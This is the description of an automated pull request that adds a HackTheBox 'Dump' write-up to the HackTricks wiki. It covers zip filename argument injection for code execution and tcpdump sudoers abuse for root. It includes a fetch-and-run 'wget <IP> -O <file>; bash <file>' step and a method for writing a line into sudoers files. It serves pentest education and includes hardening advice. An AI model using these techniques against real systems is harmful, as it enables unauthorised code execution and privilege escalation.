HTB Dump — Zip argument injection to RCE and tcpdump sudo mi...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2025/11/04/htb-dump.html
• Blog Title: HTB: Dump — Zip argument injection to RCE and tcpdump sudo misconfig to root
• Suggested Section: Web Pentesting > Archive/Zip argument injection via filenames (zip -T/-TT GTFObins) and Linux Privilege Escalation > Sudoers Abuses (wildcards/additional args) > tcpdump

🎯 Content Summary

Target: HackTheBox "Dump" (Hard, Linux). Likely Debian 11 Bullseye from OpenSSH banner; kernel later confirmed as 5.10.0-36-cloud-amd64 (Debian 5.10.244-1, 2025-09-29). Services: SSH 22 (OpenSSH 8.4p1 Debian 5+deb11u5), HTTP 80 (Apache 2.4.65). TTL 63 on ports (Linux, one hop).

App overview (PHP): Auth via session; free registration. Key endpoints discovered with feroxbuster: index.php, capture.php, capturing.php, u...

🔧 Technical Details

Zip argument injection via filenames: When an app zips user files by calling zip archive.zip * (or by passing raw user filenames), attacker-supplied names starting with option flags are parsed as zip options. Use -sc (show processed argv) to debug ordering and then supply -T and -TT <cmd> as separate filenames so the test command becomes your payload. If slashes are stripped, use wget <IP> -O <file>; bash <file> to fetch and execute a payload.

tcpdump sudo rule abuse: If sudoers allows tcpdump with -w containing a globbed directory, add a second -w to override the output path while satisfying the policy. Combine with -Z root to force root ownership, -r <pcap> to inject arbitrary content (e.g., a sudoers line) into sensitive files, and -V <file> to coerce reads that leak file content via ...

🤖 Agent Actions

I analyzed the blog and updated HackTricks with the core, reusable techniques that weren’t fully covered yet:

• Zip argument injection via filenames to achieve RCE using zip’s -T/-TT tester override, including practical nuances like:
  • Using separate tokens (“-T” and “-TT ”) due to short-option parsing.
  • Debugging with -sc to view argv processing.
  • Slash-stripping constraints and using wget -O ; bash .
• Sudoers tcpdump misconfig abuse when extra args and wildcards are allowed:
  • Satisfying the sudoers pattern with the first -w and overriding with a second -w.
  • Forcing root ownership with -Z root.
  • Using -r to replay a crafted PCAP to write attacker-chosen content into protected files (e.g., sudoers.d).
  • Using -V to coerce reads and leak content via diagnostics.
  • Defensive guidance for locking down sudoers and tcpdump usage.

Repository exploration

• I searched for existing relevant pages and found the best fit to aggregate and extend both topics in one place: src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md.
  • This page already covered wildcard/argument injection themes and had a brief zip entry and a tcpdump wrapper abuse section, so it’s appropriate to extend it with the new zip (-T/-TT) technique and the tcpdump sudoers patterns/abuses.

What I changed

• File modified: src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
  • Expanded “zip” section with:
    • Detailed -T/-TT exploitation via filenames.
    • -sc argv inspection tip.
    • Handling filename slash restrictions with wget -O and exec.
    • A concise example of local behavior and ordering pitfalls.
  • Added a new section “sudoers: tcpdump with wildcards/additional args → arbitrary write/read and root”:
    • Explained the sudoers anti-pattern, multi -w override, path traversal, -Z root, -r replay to write files, -V read/leak.
    • Included hardening guidance to pin all args, avoid globs, disable dangerous flags, and use a wrapper.
  • Kept existing content intact and consistent with HackTricks style.
  • Updated References with:
    • The blog post URL (0xdf – HTB Dump).
    • GTFOBins zip (in addition to existing tcpdump reference).

Why this location

• The page already aggregates wildcard/argument injection tricks for archivers and other binaries, including zip and tcpdump wrapper abuses. Extending it avoids duplication elsewhere and keeps related primitives together for discoverability.

No other files were changed to comply with the “one file only” requirement.

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

📚 Repository Maintenance

• MD files processed: 907
• MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/11/04/htb-dump.html

Content Categories: Based on the analysis, this content was categorized under "Web Pentesting > Archive/Zip argument injection via filenames (zip -T/-TT GTFObins) and Linux Privilege Escalation > Sudoers Abuses (wildcards/additional args) > tcpdump".

Repository Maintenance:

• MD Files Formatting: 907 files processed (1 files fixed)

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0